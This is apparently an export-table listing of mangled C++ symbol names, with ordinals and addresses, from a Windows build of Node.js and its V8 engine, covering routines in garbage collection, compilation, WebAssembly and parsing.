                                                                                                                                                                                                        ?Add@SmallOrderedHashMap@internal@v8@@SA?AV?$MaybeHandle@VSmallOrderedHashMap@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VSmallOrderedHashMap@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@2@Z27870x1407e2660
                                                                                                                                                                                                        ?Add@SmallOrderedHashSet@internal@v8@@SA?AV?$MaybeHandle@VSmallOrderedHashSet@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VSmallOrderedHashSet@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@@Z27880x1407e2900
                                                                                                                                                                                                        ?Add@SmallOrderedNameDictionary@internal@v8@@SA?AV?$MaybeHandle@VSmallOrderedNameDictionary@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VSmallOrderedNameDictionary@internal@v8@@@23@V?$Handle@VName@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@VPropertyDetails@23@@Z27890x1407e2ae0
                                                                                                                                                                                                        ?Add@StringSet@internal@v8@@SA?AV?$Handle@VStringSet@internal@v8@@@23@PEAVIsolate@23@V423@V?$Handle@VString@internal@v8@@@23@@Z27900x1407f00a0
                                                                                                                                                                                                        ?AddAll@BitVector@internal@v8@@QEAAXXZ27910x1404baf00
                                                                                                                                                                                                        ?AddAllocation@GCTracer@internal@v8@@QEAAXN@Z27920x1409c8160
                                                                                                                                                                                                        ?AddAllocationObserver@AllocationCounter@internal@v8@@QEAAXPEAVAllocationObserver@23@@Z27930x1409f3590
                                                                                                                                                                                                        ?AddAllocationObserver@Space@internal@v8@@UEAAXPEAVAllocationObserver@23@@Z27940x140955d60
                                                                                                                                                                                                        ?AddAllocationObserver@SpaceWithLinearArea@internal@v8@@UEAAXPEAVAllocationObserver@23@@Z27950x140955d70
                                                                                                                                                                                                        ?AddArgument@AsmFunctionType@wasm@internal@v8@@QEAAXPEAVAsmType@234@@Z27960x140632260
                                                                                                                                                                                                        ?AddArrayType@WasmModuleBuilder@wasm@internal@v8@@QEAAIPEAVArrayType@234@@Z27970x14053ebf0
                                                                                                                                                                                                        ?AddArrowFunctionFormalParameters@Parser@internal@v8@@AEAAXPEAUParserFormalParameters@23@PEAVExpression@23@H@Z27980x1407a3620
                                                                                                                                                                                                        ?AddAsmWasmOffset@WasmFunctionBuilder@wasm@internal@v8@@QEAAX_K0@Z27990x14053ec30
                                                                                                                                                                                                        ?AddAttachedObject@?$Deserializer@VIsolate@internal@v8@@@internal@v8@@IEAAXV?$Handle@VHeapObject@internal@v8@@@23@@Z28000x1406c1d10
                                                                                                                                                                                                        ?AddAttachedObject@?$Deserializer@VLocalIsolate@internal@v8@@@internal@v8@@IEAAXV?$Handle@VHeapObject@internal@v8@@@23@@Z28010x1406c1d10
                                                                                                                                                                                                        ?AddBeforeCallEnteredCallback@Isolate@internal@v8@@QEAAXP6AXPEAV13@@Z@Z28020x140a0b3c0
                                                                                                                                                                                                        ?AddBeforeCallEnteredCallback@Isolate@v8@@QEAAXP6AXPEAV12@@Z@Z28030x140b07de0
                                                                                                                                                                                                        ?AddBignum@Bignum@base@v8@@QEAAXAEBV123@@Z28040x140e6fa60
                                                                                                                                                                                                        ?AddBinaryOpICSlot@FeedbackVectorSpec@internal@v8@@QEAA?AVFeedbackSlot@23@XZ28050x140481680
                                                                                                                                                                                                        ?AddBlock@LocalHandles@internal@v8@@AEAAPEA_KXZ28060x1409f4200
                                                                                                                                                                                                        ?AddBlockRequiringSpillOperand@TopLevelLiveRange@compiler@internal@v8@@QEAAXVRpoNumber@234@PEBVTopTierRegisterAllocationData@234@@Z28070x140f0dec0
                                                                                                                                                                                                        ?AddBranch@Schedule@compiler@internal@v8@@QEAAXPEAVBasicBlock@234@PEAVNode@234@00@Z28080x140ee1af0
                                                                                                                                                                                                        ?AddBuildEmbedderGraphCallback@HeapProfiler@v8@@QEAAXP6AXPEAVIsolate@2@PEAVEmbedderGraph@2@PEAX@Z2@Z28090x140b07df0
                                                                                                                                                                                                        ?AddCall@Schedule@compiler@internal@v8@@QEAAXPEAVBasicBlock@234@PEAVNode@234@00@Z28100x140ee1bd0
                                                                                                                                                                                                        ?AddCallCompletedCallback@Isolate@internal@v8@@QEAAXP6AXPEAV13@@Z@Z28110x140a0b400
                                                                                                                                                                                                        ?AddCallCompletedCallback@Isolate@v8@@QEAAXP6AXPEAV12@@Z@Z28120x140b07e00
                                                                                                                                                                                                        ?AddCallICSlot@FeedbackVectorSpec@internal@v8@@QEAA?AVFeedbackSlot@23@XZ28130x1404816a0
                                                                                                                                                                                                        ?AddCallback@CompilationState@wasm@internal@v8@@QEAAXV?$function@$$A6AXW4CompilationEvent@wasm@internal@v8@@@Z@std@@@Z28140x140594ff0
                                                                                                                                                                                                        ?AddCaseEquivalents@CharacterRange@internal@v8@@SAXPEAVIsolate@23@PEAVZone@23@PEAV?$ZoneList@VCharacterRange@internal@v8@@@23@_N@Z28150x140732930
                                                                                                                                                                                                        ?AddCategory@FreeListManyCached@internal@v8@@UEAA_NPEAVFreeListCategory@23@@Z28160x1409cca00
                                                                                                                                                                                                        ?AddCharacterCore@StringHasher@internal@v8@@SAIIG@Z28170x1404816c0
                                                                                                                                                                                                        ?AddChild@PreparseDataBuilder@internal@v8@@AEAAXPEAV123@@Z28180x14079ff20
                                                                                                                                                                                                        ?AddClassEscape@CharacterRange@internal@v8@@SAXDPEAV?$ZoneList@VCharacterRange@internal@v8@@@23@PEAVZone@23@@Z28190x140732cb0
                                                                                                                                                                                                        ?AddClassEscape@CharacterRange@internal@v8@@SAXDPEAV?$ZoneList@VCharacterRange@internal@v8@@@23@_NPEAVZone@23@@Z28200x140733010
                                                                                                                                                                                                        ?AddClassStaticBlock@Parser@internal@v8@@AEAAXPEAVBlock@23@PEAUClassInfo@?$ParserBase@VParser@internal@v8@@@23@@Z28210x1407a37d0
                                                                                                                                                                                                        ?AddCloneObjectSlot@FeedbackVectorSpec@internal@v8@@QEAA?AVFeedbackSlot@23@XZ28220x1404816e0
                                                                                                                                                                                                        ?AddClonedNode@GraphAssembler@compiler@internal@v8@@IEAAPEAVNode@234@PEAV5234@@Z28230x140f58860
                                                                                                                                                                                                        ?AddCode@CodeMap@internal@v8@@QEAAX_KPEAVCodeEntry@23@I@Z28240x14074d2e0
                                                                                                                                                                                                        ?AddCode@NativeModule@wasm@internal@v8@@QEAA?AV?$unique_ptr@VWasmCode@wasm@internal@v8@@U?$default_delete@VWasmCode@wasm@internal@v8@@@std@@@std@@HAEBVCodeDesc@34@HIV?$Vector@$$CBE@base@4@1W4Kind@WasmCode@234@W4ExecutionTier@234@W4ForDebugging@234@@Z28250x140566f70
                                                                                                                                                                                                        ?AddCodeEventListener@Logger@internal@v8@@QEAAXPEAVCodeEventListener@23@@Z28260x1408d1950
                                                                                                                                                                                                        ?AddCodeForTesting@NativeModule@wasm@internal@v8@@QEAAPEAVWasmCode@234@V?$Handle@VCode@internal@v8@@@34@@Z28270x140567140
                                                                                                                                                                                                        ?AddCodeMemoryChunk@Isolate@internal@v8@@QEAAXPEAVMemoryChunk@23@@Z28280x140078990
                                                                                                                                                                                                        ?AddCodeMemoryRange@Isolate@internal@v8@@AEAAXUMemoryRange@3@@Z28290x140a0b440
                                                                                                                                                                                                        ?AddCodeRange@Isolate@internal@v8@@QEAAX_K0@Z28300x140a0b610
                                                                                                                                                                                                        ?AddCodeSpaceLocked@NativeModule@wasm@internal@v8@@AEAAXVAddressRegion@base@4@@Z28310x140567640
                                                                                                                                                                                                        ?AddCodeTarget@AssemblerBase@internal@v8@@IEAAHV?$Handle@VCode@internal@v8@@@23@@Z28320x140ab4060
                                                                                                                                                                                                        ?AddCodeWithCodeSpace@NativeModule@wasm@internal@v8@@AEAA?AV?$unique_ptr@VWasmCode@wasm@internal@v8@@U?$default_delete@VWasmCode@wasm@internal@v8@@@std@@@std@@HAEBVCodeDesc@34@HIV?$Vector@$$CBE@base@4@1W4Kind@WasmCode@234@W4ExecutionTier@234@W4ForDebugging@234@V?$Vector@E@94@AEBUJumpTablesRef@1234@@Z28330x140567b30
                                                                                                                                                                                                        ?AddCompactionEvent@GCTracer@internal@v8@@QEAAXN_K@Z28340x1409c82f0
                                                                                                                                                                                                        ?AddCompareICSlot@FeedbackVectorSpec@internal@v8@@QEAA?AVFeedbackSlot@23@XZ28350x140481700
                                                                                                                                                                                                        ?AddCompiledCode@NativeModule@wasm@internal@v8@@QEAA?AV?$unique_ptr@VWasmCode@wasm@internal@v8@@U?$default_delete@VWasmCode@wasm@internal@v8@@@std@@@std@@UWasmCompilationResult@234@@Z28360x140567ef0
                                                                                                                                                                                                        ?AddCompiledCode@NativeModule@wasm@internal@v8@@QEAA?AV?$vector@V?$unique_ptr@VWasmCode@wasm@internal@v8@@U?$default_delete@VWasmCode@wasm@internal@v8@@@std@@@std@@V?$allocator@V?$unique_ptr@VWasmCode@wasm@internal@v8@@U?$default_delete@VWasmCode@wasm@internal@v8@@@std@@@std@@@2@@std@@V?$Vector@UWasmCompilationResult@wasm@internal@v8@@@base@4@@Z28370x140568020
                                                                                                                                                                                                        ?AddConcurrentlyMarkedBytes@IncrementalMarkingSchedule@internal@cppgc@@QEAAX_K@Z28380x140461a20
                                                                                                                                                                                                        ?AddConstant@InstructionSequence@compiler@internal@v8@@QEAAHHVConstant@234@@Z28390x1404baf30
                                                                                                                                                                                                        ?AddContext@SnapshotCreator@v8@@QEAA_KV?$Local@VContext@v8@@@2@USerializeInternalFieldsCallback@2@@Z28400x140b07e10
                                                                                                                                                                                                        ?AddCrashKey@Isolate@internal@v8@@QEAAXW4CrashKeyId@3@AEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z28410x140481720
                                                                                                                                                                                                        ?AddCrashKeysForIsolateAndHeapPointers@Isolate@internal@v8@@AEAAXXZ28420x140a0b630
                                                                                                                                                                                                        ?AddCreateClosureSlot@FeedbackVectorSpec@internal@v8@@QEAAHXZ28430x140481740
                                                                                                                                                                                                        ?AddCurrentStack@ProfilerEventsProcessor@internal@v8@@QEAAX_N@Z28440x140760ee0
                                                                                                                                                                                                        ?AddData@SnapshotCreator@v8@@AEAA_KV?$Local@VContext@v8@@@2@_K@Z28450x140b07f20
                                                                                                                                                                                                        ?AddData@SnapshotCreator@v8@@AEAA_K_K@Z28460x140b08110
                                                                                                                                                                                                        ?AddDataElement@JSObject@internal@v8@@SA?AV?$Maybe@_N@3@V?$Handle@VJSObject@internal@v8@@@23@IV?$Handle@VObject@internal@v8@@@23@W4PropertyAttributes@23@@Z28470x140831970
                                                                                                                                                                                                        ?AddDataSegment@WasmModuleBuilder@wasm@internal@v8@@QEAAXPEBEII@Z28480x14053ed00
                                                                                                                                                                                                        ?AddDecorator@Graph@compiler@internal@v8@@QEAAXPEAVGraphDecorator@234@@Z28490x140f37150
                                                                                                                                                                                                        ?AddDecorator@NodeOriginTable@compiler@internal@v8@@QEAAXXZ28500x140f6c6b0
                                                                                                                                                                                                        ?AddDecorator@SourcePositionTable@compiler@internal@v8@@QEAAXXZ28510x140f53e10
                                                                                                                                                                                                        ?AddDeferredReference@WebSnapshotDeserializer@internal@v8@@AEAAXV?$Handle@VObject@internal@v8@@@23@IW4ValueType@WebSnapshotSerializerDeserializer@23@I@Z28520x1406ac6d0
                                                                                                                                                                                                        ?AddDeoptStack@ProfilerEventsProcessor@internal@v8@@QEAAX_KH@Z28530x140761000
                                                                                                                                                                                                        ?AddDeoptimizationEntry@InstructionSequence@compiler@internal@v8@@QEAAHPEAVFrameStateDescriptor@234@W4DeoptimizeKind@34@W4DeoptimizeReason@34@IAEBUFeedbackSource@234@@Z28540x140ea88a0
                                                                                                                                                                                                        ?AddDeoptimizationExit@CodeGenerator@compiler@internal@v8@@AEAAPEAVDeoptimizationExit@234@PEAVInstruction@234@_K1@Z28550x140ee4f00
                                                                                                                                                                                                        ?AddDeoptimize@Schedule@compiler@internal@v8@@QEAAXPEAVBasicBlock@234@PEAVNode@234@@Z28560x140ee1cb0
                                                                                                                                                                                                        ?AddDeserializedCode@NativeModule@wasm@internal@v8@@QEAA?AV?$unique_ptr@VWasmCode@wasm@internal@v8@@U?$default_delete@VWasmCode@wasm@internal@v8@@@std@@@std@@HV?$Vector@E@base@4@HIHHHHHV?$Vector@$$CBE@84@11W4Kind@WasmCode@234@W4ExecutionTier@234@@Z28570x140568520
                                                                                                                                                                                                        ?AddDetachedContext@Isolate@internal@v8@@QEAAXV?$Handle@VContext@internal@v8@@@23@@Z28580x140a0b7f0
                                                                                                                                                                                                        ?AddDispatchTable@WasmTableObject@internal@v8@@SAXPEAVIsolate@23@V?$Handle@VWasmTableObject@internal@v8@@@23@V?$Handle@VWasmInstanceObject@internal@v8@@@23@H@Z28590x14052ea70
                                                                                                                                                                                                        ?AddEmbeddedObject@AssemblerBase@internal@v8@@IEAA_KV?$Handle@VHeapObject@internal@v8@@@23@@Z28600x140ab40d0
                                                                                                                                                                                                        ?AddEntry@?$ObjectHashTableBase@VEphemeronHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@IEAAXVInternalIndex@23@VObject@23@1@Z28610x1407f0920
                                                                                                                                                                                                        ?AddEntry@?$ObjectHashTableBase@VObjectHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@IEAAXVInternalIndex@23@VObject@23@1@Z28620x1407f0980
                                                                                                                                                                                                        ?AddEntry@SourcePositionTableBuilder@internal@v8@@AEAAXAEBUPositionTableEntry@23@@Z28630x140a7f080
                                                                                                                                                                                                        ?AddEntry@V8HeapExplorer@internal@v8@@AEAAPEAVHeapEntry@23@VHeapObject@23@@Z28640x140752a10
                                                                                                                                                                                                        ?AddEntry@V8HeapExplorer@internal@v8@@AEAAPEAVHeapEntry@23@VHeapObject@23@W4Type@423@PEBD@Z28650x140752f70
                                                                                                                                                                                                        ?AddEntry@V8HeapExplorer@internal@v8@@QEAAPEAVHeapEntry@23@_KW4Type@423@PEBD0@Z28660x140752fe0
                                                                                                                                                                                                        ?AddEnvironmentCleanupHook@node@@YAXPEAVIsolate@v8@@P6AXPEAX@Z1@Z28670x1402898f0
                                                                                                                                                                                                        ?AddEnvironmentCleanupHookInternal@node@@YAPEAUACHHandle@1@PEAVIsolate@v8@@P6AXPEAXP6AX1@Z1@Z1@Z28680x140289970
                                                                                                                                                                                                        ?AddException@WasmModuleBuilder@wasm@internal@v8@@QEAAIPEAV?$Signature@VValueType@wasm@internal@v8@@@34@@Z28690x14053ef20
                                                                                                                                                                                                        ?AddExport@WasmModuleBuilder@wasm@internal@v8@@QEAAXV?$Vector@$$CBD@base@4@PEAVWasmFunctionBuilder@234@@Z28700x14053ef70
                                                                                                                                                                                                        ?AddExport@WasmModuleBuilder@wasm@internal@v8@@QEAAXV?$Vector@$$CBD@base@4@W4ImportExportKindCode@234@I@Z28710x14053efc0
                                                                                                                                                                                                        ?AddExportedGlobal@WasmModuleBuilder@wasm@internal@v8@@QEAAIVValueType@234@_NVWasmInitExpr@234@V?$Vector@$$CBD@base@4@@Z28720x14053f010
                                                                                                                                                                                                        ?AddForInSlot@FeedbackVectorSpec@internal@v8@@QEAA?AVFeedbackSlot@23@XZ28730x140481750
                                                                                                                                                                                                        ?AddForTesting@LazilyGeneratedNames@wasm@internal@v8@@QEAAXHVWireBytesRef@234@@Z28740x140538c40
                                                                                                                                                                                                        ?AddFormalParameter@Parser@internal@v8@@AEAAXPEAUParserFormalParameters@23@PEAVExpression@23@1H_N@Z28750x140773580
                                                                                                                                                                                                        ?AddFreshPage@NewSpace@internal@v8@@QEAA_NXZ28760x14096ed20
                                                                                                                                                                                                        ?AddFreshPageSynchronized@NewSpace@internal@v8@@QEAA_NXZ28770x14096ee40
                                                                                                                                                                                                        ?AddFunction@WasmModuleBuilder@wasm@internal@v8@@QEAAPEAVWasmFunctionBuilder@234@PEAV?$Signature@VValueType@wasm@internal@v8@@@34@@Z28780x14053f160
                                                                                                                                                                                                        ?AddFunctionForNameInference@Parser@internal@v8@@AEAAXPEAVFunctionLiteral@23@@Z28790x140773650
                                                                                                                                                                                                        ?AddGCEpilogueCallback@Isolate@v8@@QEAAXP6AXPEAV12@W4GCType@2@W4GCCallbackFlags@2@@Z1@Z28800x140b08280
                                                                                                                                                                                                        ?AddGCEpilogueCallback@Isolate@v8@@QEAAXP6AXPEAV12@W4GCType@2@W4GCCallbackFlags@2@PEAX@Z31@Z28810x140b082a0
                                                                                                                                                                                                        ?AddGCEpilogueCallback@LocalHeap@internal@v8@@QEAAXP6AXPEAX@Z0@Z28820x1409a3530
                                                                                                                                                                                                        ?AddGCPrologueCallback@Isolate@v8@@QEAAXP6AXPEAV12@W4GCType@2@W4GCCallbackFlags@2@@Z1@Z28830x140b082c0
                                                                                                                                                                                                        ?AddGCPrologueCallback@Isolate@v8@@QEAAXP6AXPEAV12@W4GCType@2@W4GCCallbackFlags@2@PEAX@Z31@Z28840x140b082e0
                                                                                                                                                                                                        ?AddGlobal@WasmModuleBuilder@wasm@internal@v8@@QEAAIVValueType@234@_NVWasmInitExpr@234@@Z28850x14053f210
                                                                                                                                                                                                        ?AddGlobalImport@WasmModuleBuilder@wasm@internal@v8@@QEAAIV?$Vector@$$CBD@base@4@VValueType@234@_N0@Z28860x14053f420
                                                                                                                                                                                                        ?AddGoto@Schedule@compiler@internal@v8@@QEAAXPEAVBasicBlock@234@0@Z28870x140ee1d40
                                                                                                                                                                                                        ?AddHeapObjectAllocationTracker@Heap@internal@v8@@QEAAXPEAVHeapObjectAllocationTracker@23@@Z28880x1409af060
                                                                                                                                                                                                        ?AddImmediate@InstructionSequence@compiler@internal@v8@@QEAA?AVImmediateOperand@234@AEBVConstant@234@@Z28890x1404bb030
                                                                                                                                                                                                        ?AddImport@WasmModuleBuilder@wasm@internal@v8@@QEAAIV?$Vector@$$CBD@base@4@PEAV?$Signature@VValueType@wasm@internal@v8@@@34@0@Z28900x14053f4e0
                                                                                                                                                                                                        ?AddIncrementalMarkingStep@GCTracer@internal@v8@@QEAAXN_K@Z28910x1409c8350
                                                                                                                                                                                                        ?AddInlineReducer@GraphAssembler@compiler@internal@v8@@QEAAXPEAVReducer@234@@Z28920x140ee1f60
                                                                                                                                                                                                        ?AddInlinedFunction@OptimizedCompilationInfo@internal@v8@@QEAAHV?$Handle@VSharedFunctionInfo@internal@v8@@@23@V?$Handle@VBytecodeArray@internal@v8@@@23@VSourcePosition@23@@Z28930x140a82770
                                                                                                                                                                                                        ?AddInnerScope@Scope@internal@v8@@AEAAXPEAV123@@Z28940x1406eab90
                                                                                                                                                                                                        ?AddInputsToFrameStateDescriptor@InstructionSelector@compiler@internal@v8@@AEAA_KPEAVFrameStateDescriptor@234@VFrameState@234@PEAVOperandGenerator@234@PEAVStateObjectDeduplicator@234@PEAV?$ZoneVector@VInstructionOperand@compiler@internal@v8@@@34@W4FrameStateInputKind@234@PEAVZone@34@@Z28950x140ed3790
                                                                                                                                                                                                        ?AddInputsToFrameStateDescriptor@InstructionSelector@compiler@internal@v8@@AEAA_KPEAVStateValueList@234@PEAV?$ZoneVector@VInstructionOperand@compiler@internal@v8@@@34@PEAVOperandGenerator@234@PEAVStateObjectDeduplicator@234@PEAVNode@234@W4FrameStateInputKind@234@PEAVZone@34@@Z28960x140ed3ab0
                                                                                                                                                                                                        ?AddInstance@WasmMemoryObject@internal@v8@@SAXPEAVIsolate@23@V?$Handle@VWasmMemoryObject@internal@v8@@@23@V?$Handle@VWasmInstanceObject@internal@v8@@@23@@Z28970x14052ec40
                                                                                                                                                                                                        ?AddInstanceOfSlot@FeedbackVectorSpec@internal@v8@@QEAA?AVFeedbackSlot@23@XZ28980x140481770
                                                                                                                                                                                                        ?AddInstruction@InstructionScheduler@compiler@internal@v8@@QEAAXPEAVInstruction@234@@Z28990x140f53430
                                                                                                                                                                                                        ?AddInstruction@InstructionSelector@compiler@internal@v8@@QEAAXPEAVInstruction@234@@Z29000x140ed3e40
                                                                                                                                                                                                        ?AddInstruction@InstructionSequence@compiler@internal@v8@@QEAAHPEAVInstruction@234@@Z29010x140ea88f0
                                                                                                                                                                                                        ?AddInternal@SwissNameDictionary@internal@v8@@AEAAHVName@23@VObject@23@VPropertyDetails@23@@Z29020x140481790
                                                                                                                                                                                                        ?AddIsolate@WasmEngine@wasm@internal@v8@@QEAAXPEAVIsolate@34@@Z29030x140554600
                                                                                                                                                                                                        ?AddJumpTable@CodeGenerator@compiler@internal@v8@@AEAAPEAVLabel@34@PEAPEAV534@_K@Z29040x140ee4f30
                                                                                                                                                                                                        ?AddKeyedHasICSlot@FeedbackVectorSpec@internal@v8@@QEAA?AVFeedbackSlot@23@XZ29050x140481860
                                                                                                                                                                                                        ?AddKeyedLoadICSlot@FeedbackVectorSpec@internal@v8@@QEAA?AVFeedbackSlot@23@XZ29060x140481880
                                                                                                                                                                                                        ?AddKeyedStoreICSlot@FeedbackVectorSpec@internal@v8@@QEAA?AVFeedbackSlot@23@W4LanguageMode@23@@Z29070x1404818a0
                                                                                                                                                                                                        ?AddLiftoffBailout@NativeModule@wasm@internal@v8@@QEAAXXZ29080x1404818d0
                                                                                                                                                                                                        ?AddLinkedBinding@node@@YAXPEAVEnvironment@1@AEBUnapi_module@@@Z29090x14028beb0
                                                                                                                                                                                                        ?AddLinkedBinding@node@@YAXPEAVEnvironment@1@AEBUnode_module@1@@Z29100x14028bf00
                                                                                                                                                                                                        ?AddLinkedBinding@node@@YAXPEAVEnvironment@1@PEBDP6AXV?$Local@VObject@v8@@@v8@@V?$Local@VValue@v8@@@4@V?$Local@VContext@v8@@@4@PEAX@Z5@Z29110x14028c010
                                                                                                                                                                                                        ?AddList@BytecodeLoopAssignments@compiler@internal@v8@@QEAAXVRegister@interpreter@34@I@Z29120x141097300
                                                                                                                                                                                                        ?AddLiteralChar@Scanner@internal@v8@@AEAAXD@Z29130x1404818e0
                                                                                                                                                                                                        ?AddLiteralChar@Scanner@internal@v8@@AEAAXI@Z29140x140481920
                                                                                                                                                                                                        ?AddLiteralCharAdvance@Scanner@internal@v8@@AEAAXXZ29150x140481990
                                                                                                                                                                                                        ?AddLiteralSlot@FeedbackVectorSpec@internal@v8@@QEAA?AVFeedbackSlot@23@XZ29160x140481a40
                                                                                                                                                                                                        ?AddLoadGlobalICSlot@FeedbackVectorSpec@internal@v8@@QEAA?AVFeedbackSlot@23@W4TypeofMode@23@@Z29170x140481a60
                                                                                                                                                                                                        ?AddLoadICSlot@FeedbackVectorSpec@internal@v8@@QEAA?AVFeedbackSlot@23@XZ29180x140481a90
                                                                                                                                                                                                        ?AddLocal@DeclarationScope@internal@v8@@QEAAXPEAVVariable@23@@Z29190x140af2790
                                                                                                                                                                                                        ?AddLocal@WasmFunctionBuilder@wasm@internal@v8@@QEAAIVValueType@234@@Z29200x14053f590
                                                                                                                                                                                                        ?AddLocals@LocalDeclEncoder@wasm@internal@v8@@QEAAIIVValueType@234@@Z29210x1405a0f50
                                                                                                                                                                                                        ?AddMainThreadEvent@Recorder@metrics@v8@@UEAAXAEBUGarbageCollectionFullCycle@23@VContextId@123@@Z29220x140078990
                                                                                                                                                                                                        ?AddMainThreadEvent@Recorder@metrics@v8@@UEAAXAEBUGarbageCollectionFullMainThreadBatchedIncrementalMark@23@VContextId@123@@Z29230x140078990
                                                                                                                                                                                                        ?AddMainThreadEvent@Recorder@metrics@v8@@UEAAXAEBUGarbageCollectionFullMainThreadBatchedIncrementalSweep@23@VContextId@123@@Z29240x140078990
                                                                                                                                                                                                        ?AddMainThreadEvent@Recorder@metrics@v8@@UEAAXAEBUGarbageCollectionFullMainThreadIncrementalMark@23@VContextId@123@@Z29250x140078990
                                                                                                                                                                                                        ?AddMainThreadEvent@Recorder@metrics@v8@@UEAAXAEBUGarbageCollectionFullMainThreadIncrementalSweep@23@VContextId@123@@Z29260x140078990
                                                                                                                                                                                                        ?AddMainThreadEvent@Recorder@metrics@v8@@UEAAXAEBUGarbageCollectionYoungCycle@23@VContextId@123@@Z29270x140078990
                                                                                                                                                                                                        ?AddMainThreadEvent@Recorder@metrics@v8@@UEAAXAEBUWasmModuleCompiled@23@VContextId@123@@Z29280x140078990
                                                                                                                                                                                                        ?AddMainThreadEvent@Recorder@metrics@v8@@UEAAXAEBUWasmModuleDecoded@23@VContextId@123@@Z29290x140078990
                                                                                                                                                                                                        ?AddMainThreadEvent@Recorder@metrics@v8@@UEAAXAEBUWasmModuleInstantiated@23@VContextId@123@@Z29300x140078990
                                                                                                                                                                                                        ?AddMainThreadEvent@Recorder@metrics@v8@@UEAAXAEBUWasmModuleTieredUp@23@VContextId@123@@Z29310x140078990
                                                                                                                                                                                                        ?AddMessageListener@Isolate@v8@@QEAA_NP6AXV?$Local@VMessage@v8@@@2@V?$Local@VValue@v8@@@2@@Z1@Z29320x140b08300
                                                                                                                                                                                                        ?AddMessageListenerWithErrorLevel@Isolate@v8@@QEAA_NP6AXV?$Local@VMessage@v8@@@2@V?$Local@VValue@v8@@@2@@ZH1@Z29330x140b08310
                                                                                                                                                                                                        ?AddMicrotasksCompletedCallback@Isolate@v8@@QEAAXP6AXPEAV12@PEAX@Z1@Z29340x140b08540
                                                                                                                                                                                                        ?AddMicrotasksCompletedCallback@MicrotaskQueue@internal@v8@@UEAAXP6AXPEAVIsolate@3@PEAX@Z1@Z29350x140a02d40
                                                                                                                                                                                                        ?AddMissingTransitions@Map@internal@v8@@CA?AV?$Handle@VMap@internal@v8@@@23@PEAVIsolate@23@V423@V?$Handle@VDescriptorArray@internal@v8@@@23@@Z29360x14080ead0
                                                                                                                                                                                                        ?AddMove@ParallelMove@compiler@internal@v8@@QEAAPEAVMoveOperands@234@AEBVInstructionOperand@234@0@Z29370x1404bb100
                                                                                                                                                                                                        ?AddMove@ParallelMove@compiler@internal@v8@@QEAAPEAVMoveOperands@234@AEBVInstructionOperand@234@0PEAVZone@34@@Z29380x1404bb110
                                                                                                                                                                                                        ?AddNearHeapLimitCallback@Heap@internal@v8@@QEAAXP6A_KPEAX_K1@Z0@Z29390x1409af0d0
                                                                                                                                                                                                        ?AddNearHeapLimitCallback@Isolate@v8@@QEAAXP6A_KPEAX_K1@Z0@Z29400x140b08550
                                                                                                                                                                                                        ?AddNode@BasicBlock@compiler@internal@v8@@QEAAXPEAVNode@234@@Z29410x1404bb200
                                                                                                                                                                                                        ?AddNode@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z29420x140f589b0
                                                                                                                                                                                                        ?AddNode@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEBVOperator@234@@Z29430x140f1d440
                                                                                                                                                                                                        ?AddNode@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEBVOperator@234@HPEBQEAV5234@@Z29440x14108c060
                                                                                                                                                                                                        ?AddNode@Schedule@compiler@internal@v8@@QEAAXPEAVBasicBlock@234@PEAVNode@234@@Z29450x140ee1db0
                                                                                                                                                                                                        ?AddOperandToStateValueDescriptor@InstructionSelector@compiler@internal@v8@@AEAA_KPEAVStateValueList@234@PEAV?$ZoneVector@VInstructionOperand@compiler@internal@v8@@@34@PEAVOperandGenerator@234@PEAVStateObjectDeduplicator@234@PEAVNode@234@VMachineType@34@W4FrameStateInputKind@234@PEAVZone@34@@Z29460x140ed3ea0
                                                                                                                                                                                                        ?AddOptimizedCode@NativeContext@internal@v8@@QEAAXVCode@23@@Z29470x1408bc1a0
                                                                                                                                                                                                        ?AddOptimizedCode@OSROptimizedCodeCache@internal@v8@@SAXV?$Handle@VNativeContext@internal@v8@@@23@V?$Handle@VSharedFunctionInfo@internal@v8@@@23@V?$Handle@VCode@internal@v8@@@23@VBytecodeOffset@23@@Z29480x1407df5b0
                                                                                                                                                                                                        ?AddOrDisposeString@StringsStorage@internal@v8@@AEAAPEBDPEADH@Z29490x1407463e0
                                                                                                                                                                                                        ?AddOutputToSelectContinuation@InstructionSelector@compiler@internal@v8@@AEAAXPEAVOperandGenerator@234@HPEAVNode@234@@Z29500x1404c1870
                                                                                                                                                                                                        ?AddOverload@AsmOverloadedFunctionType@wasm@internal@v8@@QEAAXPEAVAsmType@234@@Z29510x140632280
                                                                                                                                                                                                        ?AddPage@BaseSpace@internal@cppgc@@QEAAXPEAVBasePage@23@@Z29520x140464580
                                                                                                                                                                                                        ?AddPage@LargeObjectSpace@internal@v8@@UEAAXPEAVLargePage@23@_K@Z29530x1409a44f0
                                                                                                                                                                                                        ?AddPage@PagedSpace@internal@v8@@QEAA_KPEAVPage@23@@Z29540x1409643b0
                                                                                                                                                                                                        ?AddParkedAllocationBuffer@NewSpace@internal@v8@@QEAA_NHW4AllocationAlignment@23@@Z29550x14096ee80
                                                                                                                                                                                                        ?AddPathFromEnd@ProfileTree@internal@v8@@QEAAPEAVProfileNode@23@AEBV?$vector@PEAVCodeEntry@internal@v8@@V?$allocator@PEAVCodeEntry@internal@v8@@@std@@@std@@H_N@Z29560x14074d5d0
                                                                                                                                                                                                        ?AddPathFromEnd@ProfileTree@internal@v8@@QEAAPEAVProfileNode@23@AEBV?$vector@UCodeEntryAndLineNumber@internal@v8@@V?$allocator@UCodeEntryAndLineNumber@internal@v8@@@std@@@std@@H_NW4CpuProfilingMode@3@@Z29570x14074d680
                                                                                                                                                                                                        ?AddPathToCurrentProfiles@CpuProfilesCollection@internal@v8@@QEAAXVTimeTicks@base@3@AEBV?$vector@UCodeEntryAndLineNumber@internal@v8@@V?$allocator@UCodeEntryAndLineNumber@internal@v8@@@std@@@std@@H_NVTimeDelta@53@@Z29580x14074d770
                                                                                                                                                                                                        ?AddPhi@InstructionBlock@compiler@internal@v8@@QEAAXPEAVPhiInstruction@234@@Z29590x1404bb200
